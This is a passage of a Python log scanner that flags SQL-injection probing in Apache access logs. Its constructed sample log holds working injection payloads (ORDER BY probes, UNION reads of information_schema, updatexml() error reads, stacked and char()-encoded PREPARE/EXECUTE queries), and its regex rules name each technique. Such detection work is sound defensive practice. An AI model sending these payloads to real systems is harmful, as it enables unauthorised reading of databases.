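# Constructed Apache combined-format lines (not from a real server) replaying the
# probing sequence from the notes: a clean request, an ORDER BY probe, a UNION
# read of information_schema, an updatexml() read, a stacked SHOW TABLES, a
# char()-encoded PREPARE/EXECUTE, and a scanner user-agent.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-2/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-2/?id=1%20order%20by%204--+ HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-2/?id=0%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables HTTP/1.1" 200 701 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+ HTTP/1.1" 200 333 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?inject=1%27;show%20tables;%23 HTTP/1.1" 200 210 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?inject=1%27;SET%20@sql=concat(char(115,101,108,101,99,116),%22%20*%20from%20words%22);PREPARE%20sqla%20from%20@sql;EXECUTE%20sqla; HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /Less-2/?id=3 HTTP/1.1" 200 512 "-" "sqlmap/1.7"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"$')

# Each rule is named after the technique from the notes it catches; the patterns
# run over the URL-decoded, lower-cased, char()-expanded query string.
RULES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+")),
    ("union-based read", re.compile(r"\bunion\b[\s\S]*\bselect\b")),
    ("schema enumeration", re.compile(r"\binformation_schema\.")),
    ("error-based (xpath)", re.compile(r"\b(?:updatexml|extractvalue)\s*\(")),
    ("stacked query", re.compile(r";\s*(?:show|set|prepare|execute)\b")),
    ("keyword double-write", re.compile(r"se(?:select)+lect")),
]


def decode_char_calls(text):
    """Replace MySQL char(115,101,...) calls with the string they build."""
    def repl(m):
        return "".join(chr(int(n)) for n in m.group(1).split(","))
    return re.sub(r"char\(((?:\d+\s*,\s*)*\d+)\)", repl, text)


def normalize(query):
    """URL-decode, lower-case and expand char() so encoded keywords become visible."""
    return decode_char_calls(unquote_plus(query).lower())


def scan_line(line):
    """Return {'ip', 'target', 'hits'} for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _method, target, ua = m.groups()
    query = target.partition("?")[2]
    decoded = unquote_plus(query).lower()
    norm = normalize(query)
    hits = [name for name, pat in RULES if pat.search(norm)]
    if "select" in norm and "select" not in decoded:
        hits.append("char()-encoded select")   # keyword only appears after expanding char()
    if "sqlmap" in ua.lower():
        hits.append("scanner user-agent")
    return {"ip": ip, "target": target, "hits": hits}


def scan(log_text):
    """One finding per request that matched at least one rule, in log order."""
    findings = []
    for line in log_text.splitlines():
        f = scan_line(line)
        if f and f["hits"]:
            findings.append(f)
    return findings
```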
